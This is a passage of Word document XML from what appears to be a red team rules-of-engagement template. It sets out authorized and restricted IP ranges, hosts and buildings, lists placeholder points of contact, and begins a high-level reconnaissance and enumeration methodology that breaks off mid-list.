          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>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10.10.11.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32534109" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>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10.11.0.0/16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF2B1EA" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Authorized IP Space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA027F5" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>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10.10.12.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E29ECEC" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>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10.10.13.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6972EA94" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>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10.12.0.0/16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789E2F97" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Restricted Hosts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6794AF69" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>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lastRenderedPageBreak/>
        <w:t>customer_workstation_1-1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1A3D37" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>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customer_server_1-20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAB3A4D" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Authorized Hosts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E87536" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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PII_workstation_1-1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE57F44" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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PII_server_1-20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25504E10" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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All hosts not expressly restricted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF870B" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Restricted Buildings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787C728E" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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Bldg. 1 Office 310</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5943AF50" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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Bldg. 2 Office 600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A9887A" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Authorized Buildings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E55FD3" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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Buildings 1, 2, 3, 4 All spaces not expressly restricted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689A01A2" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>APPENDIX B - POINTS OF CONTACT</w:t>
      </w:r>
      <w:hyperlink r:id="rId87" w:anchor="appendix-b---points-of-contact" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="773D97D6" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Role, Name, Title, Phone, Email, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="10F6F3D7" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Engagement Director:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF545C3" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18822EB2" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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Phone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55462905" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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Email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA09428" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>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Office Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E60BF96" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Trusted Agent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A2BD79" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4BBEF3" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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Title: Chief Information Officer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE92AA6" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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Phone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E15E8E3" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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Email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39942A5A" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>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Office Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04298907" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>White Cell Lead:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487A8C36" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>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Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2061D613" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>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Title: Chief Executive Officer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645E644D" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>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Phone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143AD02B" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>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Email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F50AE34" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>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Office Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4537DDA7" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Emergency Contact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3F2491" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>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Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106A7A70" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>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Title: Executive Assistant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE7D129" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>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Phone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4FEDC1" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>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lastRenderedPageBreak/>
        <w:t>Email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2460F97B" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>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Office Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374F9A88" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Red Team Lead:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E82BC0" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>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Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE31E24" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>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Phone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30085087" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>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Email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0611DA" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>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Office Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E7A49F" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>APPENDIX C – RED TEAM METHODOLOGY</w:t>
      </w:r>
      <w:hyperlink r:id="rId88" w:anchor="appendix-c--red-team-methodology" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB134D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="02A34C18" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">Example or representative activities only – Detail not </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>required</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t> ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAAF083" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Get In</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D9A97C" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>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Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0647C701" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>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 xml:space="preserve">Perform </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Open Source</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Intelligence (OSINT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAA1362" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>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Target websites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B65BE9" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>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Social Media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F0D429" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>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Search engines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6907EC8D" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>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Public code repositories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700ADE3F" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>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Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFD0ED8" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>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 xml:space="preserve">Identify external </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>assets</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="662F6D53" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>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 xml:space="preserve">Perform reverse DNS scan to identify </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hosts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="448208E8" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64"/>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 xml:space="preserve">Identify URLs and other external touch </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB134D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>points</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4B9C7A82" w14:textId="77777777" w:rsidR="00BB134D" w:rsidRPr="00BB134D" w:rsidRDefault="00BB134D" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
